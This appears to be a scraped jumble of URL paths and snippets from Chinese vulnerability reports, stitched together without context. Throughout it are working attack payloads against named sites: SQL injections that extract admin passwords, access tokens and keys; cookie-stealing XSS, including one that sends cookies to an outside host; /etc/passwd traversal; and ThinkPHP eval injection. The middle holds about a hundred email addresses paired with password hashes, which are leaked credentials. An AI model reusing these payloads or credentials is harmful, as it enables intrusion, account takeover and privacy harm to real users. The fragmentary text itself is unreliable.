/sina_login.php?jump=http://i.tao123.com/#access_token=xxxxxxxxxxxxxx&remind_in=******&expires_in=******&uid=****** /bank/bankHome!displayInfo.action?infoId=1361079 /vote/vote2.asp?id=34 /home/award_exchange_home.htm?succ_coins=5033234241234&closeCoin=false&tracelog=fkcgymqzicon&itemId=14882088052 / /porpoise/xmgl/index_admin.asp /frontoperation.rar /admin/ /web-console/ServerInfo.jsp / /swj/kjfw/news_kjfw!view.action?fileNews.file_ID=20144811&sysDaoHang.code=011014 / /shop/bss_list_iframe.php?pdhtype=2 /shop/admin/ /shop/admin/Dialog/listfile.php?dir=../../upload/webeditor/&ext=php http://duiyi.sina.com.cn/register/chk_id.asp?rid=wooyun&div=1 /Web/Chain/ShowHotel.aspx?Uid=8023 /card/ui/login/login.action tmxk.org/q.js / / /thinkphp.sql /index.php?app=admin&mod=Tool&act=doDownload&filename=../../config.inc.php /account/reset.php?code=XXXXXXXXXX可重复使用,导致可短时间内修改大量用户的密码,危害十分严重 /2531650746 /cgi-bin/personal/get_user_friends.cgi /cgi-bin/search_ent?keyvalue=\u003cimg%20src=%23%20onerror=eval%28/document.write /cgi-bin/search?libid=1&attr=133&tname=star_second.shtml&keyvalue=\u003cimg%20src=%23\u0020onerror=eval /notes/view/7e90912a17f3f701b2dd4bc0 /qzone/mobile/login.html /485/index.php?gOo /485/?member-120120822173108'/**/and/**/ExtractValue /shopex/shopadmin/index.php /shopex/shopadmin/index.php /bugs/wooyun-2012-010431 /chinahrdvote/2009/OrgInfo.aspx?id=92 /pay/result/xft?sae_internal=1&may_fail=0&order_id=1 /pay/result/xft?sae_internal=1&may_fail=0&order_id=1 //pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,email,0x7c,weibo_name,0x7c,weibo_access_token,0x7c,password_md5,0x7c%29,3,4,5%20from%20sae.user%20where%20weibo_uid='1627825392'%20limit%200,1%23 //pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,accesskey,0x7c,create_uid,0x7c%29,3,4,5%20from%20sae.app%20limit%200,1%23 /index.php?app=campusgroupbuy&cateID=1 /?app=buy&city_id=%22%20onmouseover%3dprompt%28970140%29%20bad%3d%22&group_id=17 /?address=%E6%B1%9F%E5%AE%81%E5%8C%BA%E5%8F%8C%E9%BE%99%E5%A4%A7%E9%81%93&app=store_map&id=62&map=118.785401,32.000455&sname=store&store_name=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28997246%29%3c%2fScRiPt%3e /index.php?act=index&app=search&keyword=1&searchBtn=1&type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28973765%29%3c%2fScRiPt%3e /index.php?app=campusgroupbuy&cateID=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28964089%29%3c%2fScRiPt%3e /?app=buy&city_id=1‘&group_id=17 /index.php?app=campusgroupbuy&cateID=1%27%22 /?app=buy&city_id=1%27%22&group_id=17 /external/modules/datacall/module.info.php /info.php /phpmyadmin/scripts/upgrade.pl /themes/mall/default/styles/default/images/member/thumbs.db /themes/store/default/groupbuy.index.html /api/ /data/ /data/files /xss.js /iPhone/index.jsp?basname=&setUserOnline=0&sap=null&macAddr= /manager/html /pages/album/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// /pages/album/swfupload.swf?movieName= /zWReXd8 /y122y2 /enpgt7 /difang_admin/admin/ admin /bbs/view_topic.php?tid=3136&vid=10 /admin_login.php?backurl=http%3a%2f%2fsurvey.news.ifeng.com%2fadmin_login.php&tm=1335580166600&uid=mengcs interlib/websearch/bookSearch /里面的商场,在购买的数量上没有考虑到负数的问题,导致当输入一个负数数量时,不扣元宝,反而还加元宝。 /pages/showBankAddress.action /manage.php /manage.php /manage.php /aticle/content.php?id=23969&cid=3/?from_0&qd=yoka&userid=45731526632你会发现里面有编辑 /a.php?v=elong&c=’document.cookie’ duapp.com/a.’” /?o=sso&m=info&func=wooyun www.mmqx.gov.cn /site/baidu.html?www.mmqx.gov.cn /s?wd=456+mmqx.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=4672 www.mmqx.gov.cn /site/baidu.html?www.mmqx.gov.cn /site/baidu.html?www.mmqx.gov.cn www.nanzheng.gov.cn被入侵挂马 /s?wd=456+nanzheng&rsv_bp=0&rsv_spt=3&inputT=2922 www.nanzheng.gov.cn /456s.asp /s?wd=wl.bynr+456&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=3531 /456s.asp www.ordosgajj.gov.cn /s?wd=456+ordosgajj.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=3656 www.ordosgajj.gov.cn /index.htm www.diqing.gov.cn / /s?wd=diqing.gov.cn+456&rsv_bp=0&rsv_spt=3&inputT=2359 www.diqing.gov.cn / / /extensions/ExtBank/360/index.htm /s?wd=gra.njut.edu.cn+456&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=375 /extensions/ExtBank/360/index.htm www.ff456.info /s?wd=456+dxzf.gov.cn&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=1703 www.dxzf.gov.cn /index.htm phpspy /shopex/shopadmin/index.php / /examinate/system/login.do /examinate/system/login.do /login.action /ourgames/admin/ /clear/admin/managerUserServlet /?g=admin&m=Video&a=preview&t=5&id=39896 /cpmanage/system/admin-login / /center/system/login.do /spread2/admin/tologin.html /tdap/ 1px 10px 14px;font-weight:bold 1px 5px 22px;padding:5px right;line-height:22px;font-weight:bold;padding-right:10px /sina-zz-api-call.html /remind/unread_count.json?target=api&_pid=0&count=0&source=3818214747 /2/oauth2/authorize?client_id=3818214747&response_type=token&display=js&redirect_uri=https://api.weibo.com/xd.html /ppjy/ /html/content.php?cont_id=77存在注入 /member/person.php /member/person.php /OrderQuery/cgs_list.aspx?para1=cxtm¶2=cxtm¶3=0 /a/5513025-1688340641.html /a/5513025-1688340641.html访问中不中 /index/login?&passwd=123456&submit=登录&phone=18624029930 /favorite/optsp?urlfrom=search&process=prompt1&pkid=1771658 /favorite/optsp?urlfrom=search&process=prompt1&pkid=1771658 /agentreport/getLinkImageShow?linkImage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /一卡通综合管理平台struts2漏洞 /verification.action /zecmd/zecmd.jsp /mega/ mega /colorring/index.jsp 118100.cn action JX01 login.jsp /customer/index.aspx /Jwweb/_data/index_JSRP.aspx /Jwweb/_help/ /cgi-bin/player/main.cgi?id=357 /snjyw/user.jsp /snjyw/sn_group.do?method=addForm /snjyw/sn_user.do?method=add /snjyw/sn_user.do?method=showList /snjyw/sn_user.do?method=editForm&userid=22 /snjyw/sn_group.do?method=checkUpdateName&groupId=11&groupname=22 /snjyw/sn_videoSort.do?method=showList /snjyw/sn_video.do?method=showList /snjyw/select.jsp /snjyw/sn_houseproject.do?method=test /snjyw/sn_houseproject.do?method=add /snjyw/sn_houseproject.do?method=add /snjyw/sn_projectsort.do?method=add /snjyw/sn_projectsort.do?method=showList /snjyw/sn_material.do?method=select /snjyw/sn_material.do?method=showList /api/async.php?a=ids&p=21233-22604-7861-20859-19420 /jasinda/iswin.txt /JwGl/bbs/viewuser.asp?name=sudo(sudo改成你注册的用户名) /JwGl/bbs/viewuser.asp?name=sudo'and%201=convert(int,(select%20top%201%20SFAdmin_Account%20from%20SFadmin))--获得管理员账号 /JwGl/bbs/viewuser.asp?name=sudo'and%201=convert(int,(select%20top%201%20SFAdmin_Password%20from%20SFadmin))-- /JwGl/ /StudentCenter/StudentInfo/StudentInfo.aspx?Type=1&StudentCode=C0855101102001203000005 hp_xpi:window['cehp_xpi']?window['cehp_xpi']:'http://download.firefox.com.cn/chinaedition/addons/cehomepage/cehomepage-latest.xpi',mosts:[],lasts:[],init:function() /'||startup.homepage()=='about:cehome /'||startup.homepage()=='about:cehome 50px;display:block;text-align:center 50px;display:block;text-align:center function() hp_xpi:window['cehp_xpi']?window['cehp_xpi']:'http://download.firefox.com.cn/chinaedition/addons/cehomepage/cehomepage-latest.xpi',mosts:[],lasts:[],init:function() function() /ff.js /n.js></script> /w.html /a.php hp_xpi:window['cehp_xpi']?window['cehp_xpi']:'http://download.firefox.com.cn/chinaedition/addons/cehomepage/cehomepage-latest.xpi',mosts:[],lasts:[],init:function() function() /w.html /3wYfI3 /n.js /file/etc/updatemepasswd /uploads/sb.txt kwspecial@gmail.com-password:88e519826c6e7f64ed83dd5f222cbf5b 435420828@qq.com-password:0794fdd7a3f98153a04bfbd6b3ed2e4f 435420828@qq.com-password 932502597@qq.com-password:0794fdd7a3f98153a04bfbd6b3ed2e4f 372486983@qq.com-password:8983683b49b1e5117fa3775bd4ea8e71 ruixuanbai@gmail.com-password:538344bd3ab84ecf3b2a8257f4bfb69b cadenza91@sina.com-password:b56f2eaa47d7bafdd427fd833831564e 421928578@qq.com-password:a1a4419eff3ca6dc2d3fa227d79f7382 popoki@foxmail.com-password:59dbc0fa881406b3ab85826ba15712fe yutong180323@163.com-password:3821744b73566f2419fba2643d07a495 rapfish@qq.com-password:4cdae08ec4b134593960e3bac693fc26 2573417504@qq.com-password:e35f328b65afdf9c255216d37f2ec4ca 63195888@qq.com-password:7531b9818a9085dd5aa269569a955d90 dai_bigtree@263.net-password:1e077f0bf453bb351ccd20211c1f1c50 hzwsy1991@163.com-password:08e55e7ddd48424cfba1c0f07cb0a5d9 86073120@qq.com-password:1b30b7acdf6e5bf7ccb1a73e4a48839e futureworker@gmail.com-password:f24fcf42969d71912f79bc7ff3ed8051 sq1022@gmail.com-password:4d7032fd1c3ee3d7054807a366d5c5ec s2x0f2@gmail.com-password:a1b69e9ee73f511993cf3f2bd4043080 59961317@qq.com-password:ac115e77aedf3c2770aca540dbc4f842 939923306@qq.com-password:09b22190be57d5de15a18a494034e91a jarber@yeah.net-password:9b1b83839625e011575b6728c1db7053 871987430@qq.com-password:dd812a2d1b9e7bbc6fdaed46e64daa53 vow7136@sina.com-password:c9145ec4c54a81d9e3279a13b27bf7ed 304825493@qq.com-password:331c2679989ba11f2357a960bdc8601e orchidc@gmail.com-password:807c21c0b99b29c6de4f29c255906ee2 ji.cao@live.com-password:8016a3012286645575ebe3a361a63459 ji.cao@live.com-password jiangpeng8424@gmail.com-password:dadf5c1b59ef532717f2b14c614fe727 cnyouker@solidot.org-password:9bc3122074b40d9d9470ff893fdd4cc1 siemendracula@163.com-password:2cf4efdd0eb20af9149cd2e65eeb06f7 1527026511@qq.com-password huajs1980@sina.com-password:2b479a243e91a3b070d2a5e4369cad13 liyangrobben@vip.qq.com-password:258a4fa98d83e4776a5a0eca80312970 ljc199077@163.com-password:23205959aa168add4bd1dc8616d470dd liupaocha@sina.com-password:1cfc8d22758737274d15c8ab4b5c5f9c 443900198@qq.com-password:df0dbd3845c3bc79f1a979a9fa9dc426 ayn715@hotmail.com-password:4c1070c7bdd8edc15f6b27d691b2a98b arsenalfanye@yeah.net-password:7d8b2544edf58c5aea5d45fbc6a6d59a autxlt@163.com-password:0ee5c42feab7c0f8295d393c49506582 lynndodo@126.com-password:0f4137ed1502b5045d6083aa258b5c42 circleyq@gmail.com-password:c19ac054c8a5c4e548e36383bd0b2ec7 117261325@qq.com-password:5585a302921b70059a618ad06c365da3 lhzzxa@gmail.com-password:b0567a2055f3bccc97a4ea3f27bce51b 334928337@qq.com-password:dc4451d61415c741db8570c378ee2b1d chenhao7179@163.com-password:32c501c605a01b2b6b84cbe6dbcb7e64 liujunyan5615@gmail.com-password:6e528ea73c3efb6a4bdd836fd017b427 836912795@qq.com-password:064f08d4a4ab5f9025698803ebd98954 289821127@qq.com-password:da95860a9dde291249a0a02b90255962 449255721@qq.com-password:32186824cc871688d94a0f69f1fff996 349881438@qq.com-password:0bb507d15ef53588d995f10011a8163b zlinetony@163.com-password:2eaea49f993994eee87171bdafce87be nick_out@msn.com-password:82ee378cb20fe94bcff7d01df363b216 chulian198563@sina.com-password:b7569e7388e663a1512050218c66d08a 15117968@qq.com-password:ee606053902dd7741d5bd46f7de2b53d 1409321237@qq.com-password:fbbdc876f33d97146ceda5af1d31772a 244891344@qq.com-password:945609558c8a3995bf2030d30e2f310e 13822527722@139.com-password:8b471d2c07b2537791d6234d64ddee2b 356255531@qq.com-password:db88ae12e02d23c4e2f484aee768748c jjjabc123@gmail.com-password:32546b751eb75ce027f0197f695e2f98 934271474@qq.com-password:b9bf338cfff10644a7708c8ce1d9ed12 360962152@qq.com-password:868ab18969d3f8b59c8671777f93730f fxxkmsn@gmail.com-password:ac886f6f68837c4f909e56c412388285 314739532@qq.com-password:4404e8a76f6835e97d6db0fedd103482 daleq1118@hotmail.com-password:58963df817d4f28741b3c558f377b67d fatjun@gmail.com-password:28331f55541279ef8950c15d16c8bdcd 275240479@qq.com-password:25d73c271c1dd95c54cfca9bfe3d9dfe leegook@gmail.com-password:da08ee40511ad8854810365411e2269e liuxv_123456789@163.com-password:b17301d76ac092e7b32a3083f74585a4 csy0093@sina.com-password:08ca9c5d74bf28887cbe62ae4242479f cadenza91@sina.com-password 1580110524@qq.com-password:92e803b2ae9581ee9a65a5bd08aac1b1 blueinsky_lee@hotmail.com-password:bbefeba062f816d0c68bb6b757f54f28 spiolynn@yahoo.cn-password:ba065b1e6e716746d83dd76392262ce4 andyzhang87@gmail.com-password:be9072eec6d7b4030d24712403cb549f 48971903@qq.com-password:78296ae4f312544e530eea6260b7983e kai_e@yahoo.cn-password:8fef3f36f2d0e69a01b670511aa3d4f4 cao91peng@126.com-password:2309275ac43161f935b00029743c753d crazylinhui@163.com-password:9643f71b3067a01dc7f3845719535482 29865567@qq.com-password:1cd341f93d7147a4bda6d2eac899fe1d 583066798@qq.com-password:8d94c6fa8db4ad63921820c6914bc66a onlyzeiss@sina.cn-password:e24f4383920303ed47c71206d221085a cqw1128@gmail.com-password:13cebba6d1bb0e3e70d289ff0fe4668a yanzi66@hotmail.com-password:0747976ce03d81883551da99c2346b8b 123093299@qq.com-password:7e759aa4804fbf540b9d3a6f9cbad2b4 118104512@qq.com-password:3c1b8a0137db234f18c9b6dd2a37ce5d lxmouseustc@163.com-password:317204bbb3b70c97e61d9af7b471f28e 406836126@qq.com-password:60557c6d0518db7fbba41a392b63d114 titanhu@qq.com-password:e7ee70e3c2f0986271eb5699693ac339 manxiao@vip.qq.com-password:db5efa0d7f411deb0183ebaf4b1f7c14 xia.dongdong@163.com-password:e0584e5ca01caea7c47c077978f88ce2 maple_zhifeng@yahoo.co.jp-password:e9086f624f5f1b754aaa11e6eff4c3b3 278415914@qq.com-password:ddd42eea9f20e367ca6ab435fcada586 mhxy13@gmai.com-password:437134ebf5f68fadd04121ce5a984bc5 181034780@qq.com-password:b78c98c650a008018e1503b38d6f3ff7 30601@qq.com-password dinuodefangjian@163.com-password:6b3df585bc316bf93ad05421feed7fb7 yanhou_liu@yahoo.com.cn-password:6c7dfe6096c793bfe593ec66dcb4ffb6 yzhou118@gmail.com-password:929e565875f0ff0216b35b26b64e09f8 lwkdota@qq.com-password:f3228715d5025ec342e95280e0f7248b 1255163139@qq.com-password:bbd11c7b6666e8b9fb638a69baad0672 hndingkai@sina.com-password:da3e7686e6d2bd6916c20bb911f90b77 liujianzhao@live.cn-password:33814acc0b112f9c4a7d49a407321729 1207397812@qq.com-password:2a42591722571f604899f3c1cc657ca0 niubi@asu.edu-password:1d1208991fe6d3af56e59c8b6f58d466 wz1758@163.com-password:06d2905af95979811ca987e3a7fdcb91 qianyu_wu@qq.com-password:cddea3b3655d9a56838e09c89a1ec741 shuanglingcom@hotmail.com-password:864752e55a1618c73fbea27df9221181 shuanglingcom@hotmail.com-password 573724007@qq.com-password:22638a3131d0f0a7346b178fd29f939c /test.php /...../%20all /log /log/detail/yayuncheng/120825 /product/detail?prod_id=39 www.alibaba.com/ /sogou?pid=AQxRG&query= /sogou?pid=AQxRG /xplatform/)订单页设计缺陷,可查看任意用户订单,导致客户姓名、电话、住址等信息泄露。可用软件遍历后大量收集用户信息。 baoku.360.cn/app/search?kw= baoku.360.cn/app/search?kw=%df baoku.360.cn/app/search?kw=%df /wish/index.php /teng/jkzx/%E6%96%B0%E5%BB%BA%20%E6%96%87%E6%9C%AC%E6%96%87%E6%A1%A3.txt /teng/%E5%85%89%E8%BE%89.txt /jerry/liuyi/baby.asp?id=438 /user/user!personalCenter.action /index/index.action /login.php /Fittings.aspx?type=31 /assessOnLine/Login!loginOut.action /welcome?history=http://kan.weibo.com/1577826897/myxss%27/%3E alert%28document.cookie /jsp_cn/jquery/end/product_message.jsp?pid=【文档ID】&islogin=0&code=&userIp=【IP地址】&message=【评论内容】&date=1346072806861 / /search?lm=2&word= /admin/home.php /admin/tj.php /listgoods/index/cat_id/+union+select+1,2,+-- /listgoods/index/cat_id/+sleep(1)%23 /listgoods/index/cat_id/+unio / /list/14565.html /pageview/pos?app=from_tag&url=http://www.jiapin.com/list/14565.html user.jiapin.com/pageview/pos?app=from_tag&url=http://ebay.de /cps/cpslogin/together/c5ac81fe5e0d6246dcb4c769ead4c3ea?url_t=http://news.jiapin.com/html/zx/jiapinguandi/2012/0822/6690.html /html/zx/jiapinguandi/2012/0822/6690.html /cps/cpslogin/together/c5ac81fe5e0d6246dcb4c769ead4c3ea?url_t=http://ebay.de /sxw/PasswordFindAction.findpassword.act /sxw/PasswordFindAction.tofindpassword.act?uid=1484517&type=004 /index.php?controller=common&action=ajaxup /wxqmx.html?rf= /rxhzw.html?rf= /sqol.html?rf= /jxqy.html?rf= /frxz2.html?rf= /sxd.html?rf= /mjcs.html?rf= /gtj.html?rf= /long.html?rf= /wl3.html?rf= /xksj.html?rf= /blcx.html?rf= /hhsh.html?rf= /dpcq.html?rf= /mhfx.html?rf= /tdyx.html?rf= /hhzw.html?rf= /qjp.html?rf= /wxfy.html?rf= /jjol.html?rf= /zzsf.html?rf= /mg.html?rf= /hddh.html?rf= /astd.html?rf= /frg.html?rf= /tc.html?rf= /hysd.html?rf= /ftx.html?rf= /ogzq.html?rf= /sgs.html?rf= /ddt.html?rf= /soccer.html?rf= /yqcm.html?rf= /content/878 /purchases/updatecart?number=-1&cartId=214358 /purchases/updatecart?number=999999999999999999&cartId=214358 /user/orderMsgList.do /user/edit.do?id=1704&currPage=1 /user/edit.do?id=1704 /index.php?a=detail&c=leaderboard&page=%5c&tid=26 /index.php?c=skillsets&firm=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28CHAR%2852%29%2cCHAR%2867%29%2cCHAR%28117%29%2cCHAR%2886%29%2cCHAR%2890%29%2cCHAR%2884%29%2cCHAR%28115%29%2cCHAR%28105%29%2cCHAR%28121%29%2cCHAR%2866%29%2cCHAR%28114%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 /index.php?a=checktest&c=member&tid=113%20or%20%28sleep%282%29%2b1%29%20limit%201%20-- wenda.hiall.com.cn/index.php?c=skillsets&firm=-1%27%20or%2049%20%3d%20%2747 /?a=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E&c=leaderboard&tid=null /?a=1&c=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E&tid=null /index.php?a=logininfo&c=skillsets&firm=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E /index.php?a=${@eval($_POST[admin])}\&c=test&cid=46 /system/FunPages/Frame.jsp?FileName=UpFileForm.jsp&Path=/Files / / /mini/2012duanwu/admin//Batch.php?no=21 /mini/2012duanwu/admin//Batch.php?no=21 /mini/2012duanwu/admin//Batch.php?no=21 /mini/2012duanwu/admin/list.php /viewics.php?id=155 /FCKeditor/editor/filemanager/connectors/test.html /pages/smb/products.asp?c=18 /templates/login.html,给地接社中国国旅的产品发布系统。 /w?user=wise&m=9f65cb4a8c8507ed4fece7631042843a4c10db212bd7a7402c88cb1384642c101a39fee872754c429392293c40e91e1cfdf041306d4137b6ef9ed55ddccdd27f7ad36672275c /bugs/wooyun-2010-010033 / / /bugs/wooyun-2010-010033 /article/file/cid/[cid]/?file=../../../etc/passwd /app/album/ /6912275/tag/photo/xss.html /6912275/photo/6359464/ /6912275/photo/6359464/ /up/2012/08/29/132120.28194126_160X160.jpg /uploads/c.php?c="+document.cookie /Service/Twitter.msi /Service/Twitter.msi /index.php /web/admin.php /hotel/hotelUnion.aspx?Articleid=14776 /index.php?app= www.htceshop.com对支付数量的限制不足,导致可以组合商品刷ONE /search?q=cache:vKlPcmxcbgQJ:dyactive.vip.xunlei.com/zhanzhang/report.php%3Fmethod%3Dindex%26key%3DZ4sV6HHkZ%26select%3D2%26webtype%3D3%26issource%3D2+&cd=1&hl=zh-TW&ct=clnk&gl=hk www.m.cn /group/initInfo.action /Cater/store/findCity.action /kindeditor/kindeditor.js /hdlAdmin/pages/login.jsp /source/function/function_connect.php /index!index!gotoProductsDetail.action?id=1149 /upload/ /guest/ /user/ /cache/ /admin/ /post/327306/?replypage=1#reply1895695 /post/327306/?replypage=1#reply1895697 www.zxhsd.com)下单页设计缺陷,导致订单价格可以随意修改。 /web.rar d417b7269a81cd1:1368 /p/iphone-elite/wiki/sendmodem /userlogin.action /index.action /vibtest/index.action /copyright/out.action /custody/out.action /jingsaiqt!Index.action /teacher/front/list.action?columnId=19&siteId=3 /index.action /wplw/adminlogin.action上海对外服务劳务平台 /invoicing/netpage/qiantai/adminlogin.action /201208/story/?page=2&t=66&sn_id=1 /account/UserAccountview 14.0 /account/UserAccountview /jxwsbm/PrintZkzLoginAction.do?activity=login /static/common/html/v2Jump.html?callback=alert(/xxx/) /zW1EqRD /search/ressafe.html?q=&url=javascript:alert(/xss/);//http://baike.baidu.com /user/71/09/140/1400971_beta.null?random=50.59399029793914(IE8测试) /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /php/interface.php?a=show&c=Login&m=Admin /admin/comment.asp?idtype=&id=&authorid=1'&author=&dateline1=&dateline2=&message=&ip=&orderby=&ordersc=desc&perpage=20&ac=comment&searchsubmit=%CB%D1%CB%F7 /admin/album.asp?albumid=552 /admin/pic.asp?albumid=1'&picid=&postip=&filename=&title=&hot1=&hot2=&dateline1=&dateline2=&orderby=&ordersc=desc&perpage=20&ac=pic&searchsubmit=%CB%D1%CB%F7 /admin/thread.asp?clubid=1%27&subject=&tid=&dateline1=&dateline2=&viewnum1=&viewnum2=&replynum1=&replynum2=&hot1=&hot2=&digest=&orderby=&ordersc=desc&perpage=20&ac=thread&searchsubmit=%CB%D1%CB%F7 /admin/post.asp?clubid=1%27&tid=&dateline1=&dateline2=&message=&ip=&isthread=&orderby=&ordersc=desc&perpage=20&ac=post&searchsubmit=%CB%D1%CB%F7 /saveUserinfo.do /pub.asp?key=%C8%CB%C3%F1%D3%CA%B5%E7%B3%F6%B0%E6%C9%E7%27%20and%20user%20%3E%200%20-- /php/interface.php?a=show&c=Login&m=Admin /jx3/recall/index.php?c=display&a=xx /jxsj/girlchoice/index.php?act=newimageurl&callback= /jxsj/wldahui/index.php?zoneid=z01&serverid=gate0104 /brokerinfo.php?id=13 /brokerinfo.php?id=13 /platforminfo.php?id=13&pid=25 /detail/index/soft_id/1462?recrefer=SE_D_ /91admint/ /91admint/make_html.asp?type=xml&url=../UploadFile/2012830152315.gif /template/xiaoma.asp /page/submitfb.html / /content/44 /index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /index.php/module/action/param1/%7B$%7Bphpinfo()%7D%7D /index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D /feedback.php?id=ddasdsa12sadsa1239131231==&email=xxoo@noshow.com /admin /Portal/PostInfo.aspx?postId=03e61fc1-2816-485f-8a97-5260af773980&CategoryId=cc70786a-78f9-4ef9-bff5-ddb8b0fc4e5b /shop/ /IndexAction.action /zt/aj/comment/add页面: /zt/aj/comment/add?_rnd=REPLACE_WITH_UNIX_TIMESTAMP /mail/login.action /course/?id=1 /shop/item.aspx?id=2 /resource/script/modules/boke/bokeSetting.js中有简单的字符限制(16字节),不过既然是本地js验证,显然可能通过本地搭建jsWEB应用篡改绕过。 /teacher/front/list.action?siteId=3&columnId=19 /teacher/logout.action /logout.action /cms/cmsfiles/project31/html/default/index.html /common/default.action /childsite/KA029/index.php?option=com_sectionex&controller=../../../../../../../../../../etc/passwd%00 /login/webindex.action /user/addMood,而该操作接受参数info[moonpic]和info[moodPic_mini]两个参数,参数的值分别为大图和小图的地址。 /webapp/wcs/stores/servlet/ForgotPasswordView /webapp/wcs/stores/servlet/ResetPasswordView?storeId=10052&email=邮件地址&activeCode=六位字符 /emall/RetrievePasswordView?storeId=10052&catalogId=10051输入用户名admin,会暴露管理员的邮件: /sz114/baoLiaoList_info.action /course/instance/?id=4091 /myspace/MyDiaryList.asp?username=admin /rest/2.0/pcs/file?method=upload&type=tmpfile&app_id=250528&BDUSS=56ZGZCbFBzYmlXWUlucDhpNU96WllJeDB0UEltN1pPSnlmYTAtMjNZTll0Q3RSQVFBQUFBJCQAAAAAAAAAAAomjxcmmz8AZ2Fpbm92ZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAYIArMAAAAOAqJXUAAAAAmWdCAAAAAAAxMC4zNi4xNFhmPlBYZj5QTk /api/create?a=commit&channel=chunlei&clienttype=0&web=1 /api/create请求中,md5值为cc99e700ed6e009c7d08ce4117179a5c /user/order_detail/?orderno=20120903301048 /user/order_detail/?orderno=20120903300917 /index!gotoProductsDetail.action / /personQueryRecord/list.action /Admin_FeedBack/DP_Admin_BrowseEmail.aspx?FeedID=xxx /sign/signViewList.action?useCount=0 /framework/login.action /framework/login.action /framework/login.action /naqianKey/infoUser!getinfouser.action?keyid=ff80808134ad63f20134b1db61740321&keyname=%D3%CE%CF%B7%B5%E3%BF%A8&pageCount=2 /images/help/u20.jpg/1.php /uvlogin.do /initService.action?actModule=SERVICE_YXDKNR&actId= /payonline/gztpay/qq/query_qq_price.action?nGoodsID=1 /booking)选择好拍摄时间并填写完毕相关表单后提交。 /goods!list.action?tid=2 /course/?id=1(好像修复了) /admin/index.htm http://svr.f.xunlei.com/folder/mkdir?xltime=8038554 POST requestType:8038554 http://f.xunlei.com/postProxy.html userId:53393744 /xss true /bugs/wooyun-2012-07709 /code5/submitVisit.php?vi=6716ef08df6a71db6d38cc4811666213&userData=1629814 /index.php?app=email&act=verify&vstr=5d4a3vIadUSeay1AP1uQnxzogiuCY6qFU/**ADD**/LFmzBGL0AmjMtFBPeO7of/Ss7jkwlEMS3SGYaI&from_url=http%3A%2F%2Fwww.baidu.com%2F //1111.php /zhuxian2/fifthanniversary/fifthQuery!getContent.action?works=3083 /InfoAction!showDetail.action?info.infoId=1178§ionId=TZGG /newsMessage/news_listFront.action?modle=1&pager.offset=180&listRange.pageSize=18 /student/school/login.action /a/score?pid=3156227123&gid=201850&docid=844986&type=s&score=100 /billboard/?TopTypeId=1 /.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/entries /.svn/all-wcprops /.svn/text-base/indexlist.jsp.svn-base /CRMA/ /CRMA/CRMA_RB_01_01.action /member/ui/qt/ /home/article!list.action?id=2fe680f62d300421012d3092f0d70005 /s/all?limit=10&p=%5B%7B%22t%22%3A%22high%22%2C%22name%22%3A%22x%22%2C%22year%22%3A2012%7D%2C%7Ba%3Aalert%28document.cookie%29%7D%5D&s=0&ref=sg_findfriend_highschool_search /fanBoxWidget?appId=29706&borderColor=;;width:expression%28if%28!window.x%29{alert%281%29;window.x=1}%29&characterColor=#333333&desc=1 /recruit/companyReg.jsp /boss/login.jsp /boss/ /news/class/index.php?catid=2 /admin.php /index.do /poker/intro.action /forget_psd.php?sid=e14aa9b65e0f4d05 14.0 /verify_fp.php?sid=e88bf0a11d2e7920 /message /fma/login.html?/fma/video/listoldvideo.jsp /fma/ /fma/showConfig.jsp /fma/diag/log4j.jsp /fma/diag/env.jsp /prog/register.php /prog/index.php /cgi-bin/cgi_imgproxy?url=http://0x000.tk /cn2/safe_school/url_query_index查询时官网链接,但在qq发送显示未知。 /cgi-bin/ptlogin?&u1=http://qp.qq.com/cgi-bin/cgi_imgproxy?url=http://0x000.tk /photo/p?kw=%B4%B4%D2%E2&tid=1817080100&pic_id= /service/driver_detail.jsp?DriverID=5171 / /wap/?a=header&from=&h=M&mcid=20-2 /user/select_cert_no.htm?email=10003@qq.com&pwd_type=Q /user/select_cert_no.htm?email=10003@qq.com&pwd_type=Q /Index.action?istimeout=1 www.19lou.com /user/blog/list?uid=xxxx www.19lou.com /user/blog/list?uid=2xxxx /test.js /mapp/vote/addComment.action /public/detail.php?id=4659 /html/xwzx/zxdt_info.asp?id=292 var /?ass="+escape(document.cookie);document.body.appendChild(img) /StudentCenter/Behavior/Mall/MyResource.aspx /StudentCenter/Behavior/Mall/ExchangeResource.aspx /e/register /e/register?gcsid=32e0a****隐藏若干位***3af12184&phone=180********9&s=确认 /api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271 www.zzstep.com 